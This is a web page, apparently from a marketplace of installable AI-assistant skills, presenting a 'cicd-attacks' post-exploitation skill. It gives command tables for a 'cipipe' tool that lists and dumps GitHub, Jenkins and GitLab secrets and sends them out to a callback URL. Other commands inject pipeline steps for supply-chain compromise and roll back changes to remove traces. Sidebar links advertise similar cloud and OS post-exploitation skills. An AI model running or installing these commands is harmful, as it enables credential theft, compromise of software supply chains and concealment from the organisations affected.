메뉴
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations
| name | cicd-attacks |
| description | CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab |
| category | post-exploitation |
| tags | ["cicd","github-actions","jenkins","gitlab","pipeline","supply-chain","secret-extraction","credential-access"] |
| tech_stack | ["github","jenkins","gitlab","python","requests"] |
| cwe_ids | ["CWE-522","CWE-693","CWE-829","CWE-284"] |
| chains_with | ["T1195.002","T1552.004","T1059","T1098"] |
| prerequisites | ["T1078"] |
| version | 1.0 |
CI/CD pipeline attacks target the software delivery infrastructure to extract secrets, inject malicious code, and establish persistence. After gaining access to GitHub, Jenkins, or GitLab, these tools extract stored credentials, inject pipeline steps for secret exfiltration, and manipulate workflow configurations.
pip3 install requests# Quick prerequisite check — GitHub
curl -s -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/user | jq .login
# Quick prerequisite check — Jenkins
curl -s -u "$JENKINS_USER:$JENKINS_TOKEN" "$JENKINS_URL/api/json" | jq .nodeDescription
# Quick prerequisite check — GitLab
curl -s -H "Private-Token: $GITLAB_TOKEN" "$GITLAB_URL/api/v4/user" | jq .username
| Action | Command | Purpose |
|---|---|---|
| List GitHub secrets | cipipe gh_secrets --repo OWNER/REPO --method list | Enumerate repository and environment secret names |
| Jenkins credentials | cipipe jenkins_creds --url URL --method api | List credential store entries |
| GitLab variables | cipipe gitlab_tokens --url URL --project-id ID | Enumerate CI/CD variables and tokens |
| Action | Command | Purpose |
|---|---|---|
| GitHub dispatch | cipipe gh_secrets --repo OWNER/REPO --method dispatch --callback-url URL | Exfiltrate secrets via workflow dispatch |
| Jenkins console | cipipe jenkins_creds --url URL --method console | Extract credentials via Groovy Script Console |
| GitHub logs | cipipe gh_secrets --repo OWNER/REPO --method logs | Search workflow logs for leaked secrets |
| Action | Command | Purpose |
|---|---|---|
| Inject pipeline | cipipe pipeline_inject --repo OWNER/REPO --callback-url URL | Add exfiltration step to CI/CD pipeline |
cipipe cleanup_ci
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| gh_secrets | GitHub Actions secret extraction | T1552.004 — Private Keys |
| jenkins_creds | Jenkins credential dump | T1555 — Credentials from Password Stores |
| pipeline_inject | CI/CD pipeline injection | T1195.002 — Compromise Software Supply Chain |
| gitlab_tokens | GitLab CI/CD variable extraction | T1552.004 — Private Keys |
| cleanup_ci | Pipeline modification rollback | T1070 — Indicator Removal |